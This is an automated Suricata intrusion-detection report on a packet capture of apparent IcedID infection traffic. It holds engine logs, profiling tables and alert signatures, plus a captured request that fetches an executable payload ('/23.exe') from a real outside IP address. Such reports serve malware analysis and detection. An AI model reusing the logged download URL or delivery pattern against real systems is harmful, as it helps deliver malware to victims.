Filename: 2018-12-17-IcedID-from-password-protected-Word-doc.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.1533219814 seconds
Hash: 6771a04700e519a87e61a9e8fa2a5921
Uploaded: 1548330751

Logfiles


unified2.alert.1548330770 - (36646 bytes)
unified2 alert payloads (the binary unified2 record framing renders as unreadable bytes in the original; only the captured packet payloads are readable and are reproduced here)

Client request (the same request record is logged three times in the file):

GET /23.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.141.61.249
Connection: Keep-Alive

Server response:

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 15:20:20 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 17 Dec 2018 02:13:20 GMT
ETag: "26878-57d2e531e1000"
Accept-Ranges: bytes
Content-Length: 157816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

[Binary response body omitted: a Windows PE executable (MZ header, "This program cannot be run in DOS mode", section table, and import names from KERNEL32.dll, USER32.dll, GDI32.dll, SHELL32.dll, ADVAPI32.dll, COMCTL32.dll and ole32.dll), rendered as unreadable bytes in the original.]

This file has been truncated.


suricata-report-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (17847 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/6771a04700e519a87e61a9e8fa2a592156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap -vvv -k none
elapsedtime:21.287486
stderr:
stdout:
24/1/2019 -- 11:52:31 - <Info> - Configuration node 'rule-files' redefined.
24/1/2019 -- 11:52:31 - <Notice> - This is Suricata version 4.0.0 RELEASE
24/1/2019 -- 11:52:31 - <Info> - CPUs/cores online: 1
24/1/2019 -- 11:52:31 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33360 and 'request-body-inspect-window' set to 17182 after randomization.
24/1/2019 -- 11:52:31 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33041 and 'response-body-inspect-window' set to 16698 after randomization.
24/1/2019 -- 11:52:31 - <Config> - DNS request flood protection level: 500
24/1/2019 -- 11:52:31 - <Config> - DNS per flow memcap (state-memcap): 524288
24/1/2019 -- 11:52:31 - <Config> - DNS global memcap: 16777216
24/1/2019 -- 11:52:31 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
24/1/2019 -- 11:52:31 - <Config> - preallocated 1000 hosts of size 136
24/1/2019 -- 11:52:31 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
24/1/2019 -- 11:52:31 - <Config> - using magic-file /usr/share/file/magic
24/1/2019 -- 11:52:31 - <Config> - Core dump size is unlimited.
24/1/2019 -- 11:52:31 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
24/1/2019 -- 11:52:31 - <Config> - preallocated 1000 defrag trackers of size 168
24/1/2019 -- 11:52:31 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
24/1/2019 -- 11:52:31 - <Config> - stream "prealloc-sessions": 2048 (per thread)
24/1/2019 -- 11:52:31 - <Config> - stream "memcap": 33554432
24/1/2019 -- 11:52:31 - <Config> - stream "midstream" session pickups: disabled
24/1/2019 -- 11:52:31 - <Config> - stream "async-oneside": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "checksum-validation": disabled
24/1/2019 -- 11:52:31 - <Config> - stream."inline": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "bypass": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "max-synack-queued": 5
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "memcap": 134217728
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "depth": 0
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "toserver-chunk-size": 2573
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "toclient-chunk-size": 2591
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly.raw: enabled
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "segment-prealloc": 2048
24/1/2019 -- 11:52:31 - <Config> - Delayed detect disabled
24/1/2019 -- 11:52:31 - <Config> - pattern matchers: MPM: ac, SPM: bm
24/1/2019 -- 11:52:31 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
24/1/2019 -- 11:52:31 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
24/1/2019 -- 11:52:31 - <Config> - prefilter engines: MPM
24/1/2019 -- 11:52:31 - <Config> - IP reputation disabled
24/1/2019 -- 11:52:31 - <Perf> - Registered 148 keyword profiling counters.
24/1/2019 -- 11:52:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
24/1/2019 -- 11:52:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
24/1/2019 -- 11:52:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
24/1/2019 -- 11:52:36 - <Config> - No rules loaded from ET-icmp.rules.
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
24/1/2019 -- 11:52:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
24/1/2019 -- 11:52:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
24/1/2019 -- 11:52:43 - <Config> - No rules loaded from local.rules.
24/1/2019 -- 11:52:43 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
24/1/2019 -- 11:52:44 - <Info> - Threshold config parsed: 0 rule(s) found
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tcp-packet
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tcp-stream
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for udp-packet
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for other-ip
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_uri
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_request_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_client_body
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_response_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header_names
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_header_names
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept_enc
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_accept_lang
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_referer
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_connection
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_len
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_len
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_type
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_content_type
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_start
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_start
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_header
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_method
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_cookie
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_cookie
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_uri
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_user_agent
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_host
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_raw_host
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_stat_msg
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_stat_code
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dns_query
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_sni
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_issuer
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_subject
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tls_cert_serial
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dce_stub_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for dce_stub_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_protocol
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_software
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for ssh_software
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for file_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for file_data
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_request_line
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for http_response_line
24/1/2019 -- 11:52:44 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
24/1/2019 -- 11:52:44 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
24/1/2019 -- 11:52:44 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
24/1/2019 -- 11:52:44 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
24/1/2019 -- 11:52:44 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
24/1/2019 -- 11:52:44 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
24/1/2019 -- 11:52:44 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
24/1/2019 -- 11:52:44 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
24/1/2019 -- 11:52:49 - <Perf> - Unique rule groups: 104
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver TCP packet": 35
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient TCP packet": 17
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver TCP stream": 33
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient TCP stream": 19
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toserver UDP packet": 27
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "toclient UDP packet": 17
24/1/2019 -- 11:52:49 - <Perf> - Builtin MPM "other IP packet": 3
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_uri": 14
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_request_line": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_client_body": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_response_line": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_header": 10
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_header": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_header_names": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_accept": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_referer": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_content_len": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_content_type": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_content_type": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_protocol": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_start": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_method": 5
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_cookie": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_cookie": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver http_host": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver dns_query": 4
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver tls_sni": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toserver file_data": 1
24/1/2019 -- 11:52:49 - <Perf> - AppLayer MPM "toclient file_data": 7
24/1/2019 -- 11:52:50 - <Perf> - Registered 39590 rule profiling counters.
24/1/2019 -- 11:52:50 - <Info> - fast output device (regular) initialized: alert
24/1/2019 -- 11:52:50 - <Info> - eve-log output device (regular) initialized: eve.json
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'alert'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'http'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'dns'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'tls'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'files'
24/1/2019 -- 11:52:50 - <Config> - enabling 'eve-log' module 'ssh'
24/1/2019 -- 11:52:50 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
24/1/2019 -- 11:52:50 - <Info> - stats output device (regular) initialized: stats.log
24/1/2019 -- 11:52:50 - <Config> - AutoFP mode using "Hash" flow load balancer
24/1/2019 -- 11:52:50 - <Info> - reading pcap file /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap
24/1/2019

This file has been truncated.


packet_stats.log - (13411 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          1478           107866      248172082     192837143        285.0b   98.46
 IPv4      17            23         13133175      244927281     193309659          4.4b    1.54
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          1478            66597       17082538        198595        293.5m   90.94
TMM_FLOWWORKER              IPv4      17            23           276893        6768463        696617         16.0m    4.96
TMM_RECEIVEPCAPFILE         IPv4       6          1462             2538          96570          3039          4.4m    1.38
TMM_RECEIVEPCAPFILE         IPv4      17            23             2542           4666          2740         63.0k    0.02
TMM_DECODEPCAPFILE          IPv4       6          1462             2645        4428788          5898          8.6m    2.67
TMM_DECODEPCAPFILE          IPv4      17            23             2664          11029          3531         81.2k    0.03

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          1462             2730          37048          3295          4.8m  1.80  
flow                    IPv4      17            23             2866          17054          4753        109.3k  0.04  
stream                  IPv4       6          1478             2650         237489          7960         11.8m  4.40  
app-layer               IPv4      17            23             8753          40811         17420        400.7k  0.15  
detect                  IPv4       6          1478            44694       17053684        161169        238.2m  89.10 
detect                  IPv4      17            23           225471         561076        328990          7.6m  2.83  
tcp-prune               IPv4       6          1478             2544          58058          3022          4.5m  1.67  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             5             3788          40963         21904        109.5k  34.72 
tls                     IPv4       6            28             2685           5933          3195         89.5k  28.36 
dns                     IPv4      17            23             3130           9168          5065        116.5k  36.93 
Proto detect            IPv4      17            23             3533          21856          7895        181.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6             3            85182       10268303       3482782         10.4m  52.26 
LOGGER_ALERT_FAST           IPv4      17             5            35862          83450         46610        233.1k  1.17  
LOGGER_UNIFIED2             IPv4       6             3            71908         176191        118625        355.9k  1.78  
LOGGER_UNIFIED2             IPv4      17             5            23654          43787         28413        142.1k  0.71  
LOGGER_JSON_ALERT           IPv4       6             3           100101         144960        116583        349.8k  1.75  
LOGGER_JSON_ALERT           IPv4      17             5            48637          64318         53292        266.5k  1.33  
LOGGER_JSON_DNS             IPv4      17            19            28477        6121080        363928          6.9m  34.58 
LOGGER_JSON_HTTP            IPv4       6             4            88610         141643        115109        460.4k  2.30  
LOGGER_JSON_TLS             IPv4       6            14            32323          75593         43956        615.4k  3.08  
LOGGER_JSON_FILE            IPv4       6             3            49574          87214         69571        208.7k  1.04  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           374             2597         134596         18361         6.9m  14.79 
payload                           IPv4      17            23             3884          37355         16257       373.9k  0.81  
stream                            IPv4       6           374             2536         380127         24578         9.2m  19.80 
http_uri                          IPv4       6             4             9138          16439         12427        49.7k  0.11  
http_request_line                 IPv4       6             4             7039           9764          8270        33.1k  0.07  
http_client_body                  IPv4       6             4             2888           3822          3431        13.7k  0.03  
http_header (request)             IPv4       6             4            41792          81853         63325       253.3k  0.55  
http_header (request trailer)     IPv4       6             4             2619           2676          2655        10.6k  0.02  
http_header_names (request)       IPv4       6             4            11099          22484         17949        71.8k  0.15  
http_accept (request)             IPv4       6             4             3547           7517          4956        19.8k  0.04  
http_referer (request)            IPv4       6             4             3189           3380          3280        13.1k  0.03  
http_content_len (request)        IPv4       6             4             3208           3991          3477        13.9k  0.03  
http_content_type (request)       IPv4       6             4             3027           3551          3249        13.0k  0.03  
http_protocol (request)           IPv4       6             4             3840           6292          5074        20.3k  0.04  
http_start (request)              IPv4       6             4            11950          16406         13985        55.9k  0.12  
http_raw_header (request)         IPv4       6             4             9360          17131         13804        55.2k  0.12  
http_method                       IPv4       6             4             5045           6920          6179        24.7k  0.05  
http_cookie (request)             IPv4       6             4             3190           3595          3370        13.5k  0.03  
http_raw_uri                      IPv4       6             4             4802           6848          5456        21.8k  0.05  
http_user_agent                   IPv4       6             4             2960          39705         20045        80.2k  0.17  
http_host                         IPv4       6             4             4015           7428          5490        22.0k  0.05  
dns_query                         IPv4      17            10             4684           9777          6787        67.9k  0.15  
tls_sni                           IPv4       6            14             3058          27057          6064        84.9k  0.18  
http_response_line                IPv4       6             4             6702           9790          7754        31.0k  0.07  
http_header (response)            IPv4       6           108             2630          53306          4437       479.3k  1.03  
http_header (response trailer)    IPv4       6             4             2640           3365          2881        11.5k  0.02  
http_content_type (response)      IPv4       6           108             2744          12311          3176       343.0k  0.74  
http_raw_header (response)        IPv4       6           158             4113          10499          4687       740.6k  1.59  
http_cookie (response)            IPv4       6           108             2724           4146          2891       312.3k  0.67  
http_stat_code                    IPv4       6           108             2617          17957          2956       319.3k  0.69  
tls_cert_issuer                   IPv4       6            14             3365          23113          5743        80.4k  0.17  
tls_cert_subject                  IPv4       6            14             3549          10827          5707        79.9k  0.17  
tls_cert_serial                   IPv4       6            14             3048          20891          6287        88.0k  0.19  
file_data (http response)         IPv4       6           154             2569       14472347        172590        26.6m  57.24 
Total                             IPv4                  1661                                         27956        46.4m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
PROF_DETECT_IPONLY          IPv4       6            36             3326          85675         27375        985.5k  0.32  
PROF_DETECT_IPONLY          IPv4      17            19            36602          67947         43780        831.8k  0.27  
PROF_DETECT_RULES           IPv4       6          1478             2518       16989808         56959         84.2m  27.55 
PROF_DETECT_RULES           IPv4      17            23            92557         309358        186221          4.3m  1.40  
PROF_DETECT_STATEFUL_START    IPv4       6           204             5100       16956310        179822         36.7m  12.00 
PROF_DETECT_STATEFUL_START    IPv4      17             5            15991          17649         16486         82.4k  0.03  
PROF_DETECT_STATEFUL_CONT    IPv4       6          1478             2523        8440852         13250         19.6m  6.41  
PROF_DETECT_STATEFUL_CONT    IPv4      17            23             5601          53713          8099        186.3k  0.06  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          1406             2544          26290          2722          3.8m  1.25  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            23             2579           3183          2768         63.7k  0.02  
PROF_DETECT_PREFILTER       IPv4       6          1478             7742       14741434         50595         74.8m  24.47 
PROF_DETECT_PREFILTER       IPv4      17            23            30246          80381         49276          1.1m  0.37  
PROF_DETECT_PF_PAYLOAD      IPv4       6           374            12905         445682         50939         19.1m  6.23  
PROF_DETECT_PF_PAYLOAD      IPv4      17            23             8986          42650         21531        495.2k  0.16  
PROF_DETECT_PF_TX           IPv4       6          1406             2554       14486756         25999         36.6m  11.96 
PROF_DETECT_PF_TX           IPv4      17            14             2568          16216          9712        136.0k  0.04  
PROF_DETECT_PF_SORT1        IPv4       6           234             2542          21977          3556        832.2k  0.27  
PROF_DETECT_PF_SORT1        IPv4      17            23             2870          20082          4482        103.1k  0.03  
PROF_DETECT_PF_SORT2        IPv4       6          1478             2516          29811          2771          4.1m  1.34  
PROF_DETECT_PF_SORT2        IPv4      17            23             2707           5091          3332         76.6k  0.03  
PROF_DETECT_NONMPMLIST      IPv4       6          1478             2522          32084          2957          4.4m  1.43  
PROF_DETECT_NONMPMLIST      IPv4      17            23             2579           3433          2971         68.3k  0.02  
PROF_DETECT_ALERT           IPv4       6          1478             2514          37300          2745          4.1m  1.33  
PROF_DETECT_ALERT           IPv4      17            23             2533          10344          3201         73.6k  0.02  
PROF_DETECT_CLEANUP         IPv4       6          1478             2560          46003          2905          4.3m  1.40  
PROF_DETECT_CLEANUP         IPv4      17            23             2527          16209          4060         93.4k  0.03  
PROF_DETECT_GETSGH          IPv4       6          1478             2512          27004          3086          4.6m  1.49  
PROF_DETECT_GETSGH          IPv4      17            23             2714           6547          5377        123.7k  0.04  


suricata-4.0.0-etpro-all-alert-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (2734 bytes)
12/17/2018-15:20:23.641568  [**] [1:2022482:3] ET TROJAN JS/Nemucod requesting EXE payload 2016-02-01 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.641568  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.641568  [**] [1:2022550:16] ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.17.101:49172 -> 209.141.61.249:80
12/17/2018-15:20:23.643019  [**] [1:2022050:3] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2021954:2] ET TROJAN JS/Nemucod.M.gen downloading EXE payload [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
